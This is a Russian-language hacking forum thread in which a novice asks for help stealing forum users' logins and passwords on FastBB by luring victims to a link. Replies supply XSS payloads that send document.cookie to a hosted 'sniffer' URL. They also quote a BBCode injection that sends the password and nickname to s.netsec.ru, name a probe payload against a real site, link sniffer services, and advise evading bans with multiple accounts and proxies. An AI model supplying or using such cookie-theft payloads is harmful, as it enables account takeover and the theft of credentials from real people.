|
Принцип работы сниффера
Пацаны, ну во-первых всем привет, а во-вторых... мож кто не полениться и объяснит мне принцип работы сниффера в сети и как им правильно пользоваться. И еще, а это правда, что есть такие снифферы, что если я помещу ссылку на него в форуме, а жертва по ней зайдет, то я могу получить ее пасс и логин ( мне говорили что это только на FastBB ато там пароли храняться в открытом виде )??? Мож кто научит, просветит?!
|
Привет, пацан
Принцип работы: http://ru.wikipedia.org/wiki/Sniffer Как правильно пользоваться: анализировать сетевой траффик. Правду ли тебе сказали: Да, правду. Читай тут http://old.antichat.ru/sniff/ |
Цитата:
|
Я не умею пользоваться XSS, я вообще не знаю Java Script, мне нужно что б жертва просто прошла по ссылке, я ее туда просто заманю. Я хотел истользовать активную XSS, но у меня не вышло почему-то. Она видна другим пользователям. Я вот такое отправил:
[font color=[img src=http://s.netsec.ru/s.gif/style=display:none;background:url(javascript:docum ent.images[1].src="http://s.netsec.ru//s.gif?id=79 &"+pass+nick); ]][/font] но видимо не судьба етому свершиться, да еще и сниффер на s.netsec.ru почему-то у меня не открываеться, все время мне 404 выбивает. Так что мож кто исходники даст на такой сниффер или даст ссылку где можна такую фишку зарегить? |
1) форум скажи какой
2) возможна эта хсс не под эту версию форума |
Не судьба, значит. Ты этого просто не очень сильно хочешь.
|
Я просто не очень сильно знаю. Форум FastBB ( На Borda.ru )
|
А еще одно: может кто-то обьяснить чайнику как пользоваться ScoopLm
|
Цитата:
|
Вот тебе на, бронированный форум. Ну неужели ничего не можна сделать. Так давайте все по порядку. Пароли на FastBB храняться в открытом виде, это все знают, мне не нужна активная XSS мне и пассивной было бы вполне достаточно. Пожалуйста, мужики, подскажите где можна захомутать сниффера??? Век буду признателен!
|
http://antichat.org/sniffer
|
Спасибо конечно что откликнулся, я этот сниффер видел уже, но легкомысленность ламерской души не имеет предела. Дело в том, что я не умею им пользоваться. Допустим я сделал сниффер с логином bla-bla. Тогда адрес сниффера будет выглядеть вот так http://antichat.org/s/bla-bla/log.php. Но я не пойму, какую ссылку мне жертве показывать надобно, а по какой самому заходить? Может кто не матернеться мышленно, да потратить на мою маленькую персону минуту времени???
|
Цитата:
А ссылка на снифер вот так http://antichat.ru/cgi-bin/s.jpg?'+document.cookie; |
тебе надо заходить на http://antichat.org/s/bla-bla/log.php, а жертве http://antichat.org/s/bla-blaю.gif, нотак ты увидишь только его IP а что б стірить кукисі читай темі про XSS
|
Pashahak
Сразу на фастбб лезть - это жестоко =) Потренировался бы на более уязвимых... Дело то вот в чем - за счет своей системы бесплытнх форумов фастбб имеет очень нифиговую посещаемость. Ессно, рекламодатели туда ломануться, дабы куча народу заценила их фирму или что тама у них... Ну и ессно фастбб дерет нефиговые бабки с рекламодателей... Текстовая ссылка везде - 50 ВМЗ в НЕДЕЛЮ... Поэтому они будут беречь своих юзеров... Короче, если тебе сейчас скажут уявимость таких форумов, то, скороей всего, ее залатают в ближайшие 24 часа =) А найти там багу уже ой как не просто... |
Цитата:
|
Цитата:
|
Пацаны, а допустим есть XSS http://www.neora.ru/anketa/index.php?latter="><script>alert()</script> как ее перекрутить чтоб кукисы украсть с помощью высше описанного сниффера ( тут мне ничего не нужно, я только принцип узнать хочу ) Заранее спасибо.
|
По теории вместо
alert() ставишь img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document .cookie; |
<script language="JavaScript">aa1 = new Image(); aa1.src="Сниффер"+document.cookie;</script>
|
Цитата:
|
Цитата:
|
Супер-хакеры, а возможно пассивной Xss выманить не только айпишник но и кукисы. И еще, может кто-нибуть скажет мне, - есть програмка брутфорс для фастББ?
|
Я далеко не супер-хакер, но отвечу на твой вопрос =)
С помощью пассивной хсс куки стырить можно. Та хсс, что ты показывал - это и есть пассивная. Смотри внимательней на запрос... ...+document.cookie Короче то, что мы тебе с goffog сказали - это и тырит куки =) ЗЫ Насчет брута - честно не знаю. Думаю почту побыстрей будет брутить ;) |
а в фастББ значит ета Xss тоже стырит кука? Ели так, то я ОРУ от радости!
|
Цитата:
А вот если я хочу угнать куку с форума www.qwert.borda.ru то запрос мне нужно писать в таблицу вот прямо так www.qwert.borda.ru/index.php/"><script>img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document .cookie;</script> если что не правильно поправте |
Гм, ты сказал поправить?.. Если бы все было так просто...
Почитай хотябы пару статей ачатовских про хсс, а то, я вижу, у тебя и представления нету об этом. Коротко : XSS надо уметь внедрить. Вся суть заключается в том, что вредоносный код внедряется в код страницы, которую запрашивает жертва. Но для этого в фастбб ты должен найти уязвимое место, которое позволило бы это сделать. А вот когда найдешь уже все это дело, то тогда уже и строй запрос к сниферу. Для проверки юзай следующий код : "><script>alert()</script> Оно должно выдать алерт. В простонародии - окошко. =) |
Я с фастББ не знаком но думаю там тоже есть предварительный просмотр, тоесть смотришь теме что ниже, малехо изменяешь под себя скрипт, заливаешь куда-то и всовуешь жертве. Но админы быстренько все просекут и дадут БАН по АЙПИ, так что зареги по-больше акков и юзай прокси.
|
goffog, слух, если не уверен, лучше не писать, а то в заблуждение некотыре входят ;)
Кстати на фастбб применяется супербан. И насчет предварительного просмотра - если он есть, то форум уязвим? :D ;) |
Ну если супербан, то даже программка есть для его обхода, а как я понял, предварительный просмотр, если и есть, то можно стырить куки, а про уязвимости форума я ниче не говорил.
|
Предварительный просмотр - это просто такая функция, котрорую в любой момент можно доработать и добавить фильтрацию символов... Если все переменные перед предварительным просмотром отфильтровались, то вот и облом, а на фастбб 150 тыщ процентов баги такого рода устранили. Там глубоко копать надо...
|
Почему такая уверенность? ИПБ не такой фуфлыжний форум, что б на нем такая бага была а на фастбб нет... И если на фастбб это работает, то принцип тотже.
|
Подумай сколько людей ежедневно приходят ломануть фастбб... =)
ЗЫ пхпбб круче ипб? Нет? Ну так на нем этой баги нету. А вобще оффтопим мы тут с тобой... Короче если че, в ПМ или асю. |
Приветствую.
Скорее всего не туда,но раз тематика данного топа подходит по смыслу моего сообщения, не примену воспользоваться сим обстоятельством :) Обьясните пожалуйста несведущему, до сих пор ли работает он лайн сниффер на ачате, т.к. разногласий на эту тему не мало. С ув. ThreeD |
У кого был, работает. Только было так http://antichat.ru/s/[ваш логин]/log.php
а стало так http://old.antichat.ru/s/[ваш логин]/log.php. А новый регнуть не даёт. Скорее всего связано с перенесением сайта на old.antichat |
Пассивный XSS - жертва должна кликнуть. (Изя, смотри какие помидоры)
Активный - достаточно просто загрузить страницу со криптом. (Нихyясе помидоры!) Есть разница? А вобще, что это за фигня? Тут вопрос не уязвимостей форумов, а принципа работы скрипта. Модеры спят? |
Снифферы
По поводу принципа работы сниффера и http сниффера можно всё узнать здесь, аж три части инфы http://www1.hut.ru/aneksniff/
Там же и сам сниффер выложен. |
| Время: 03:47 |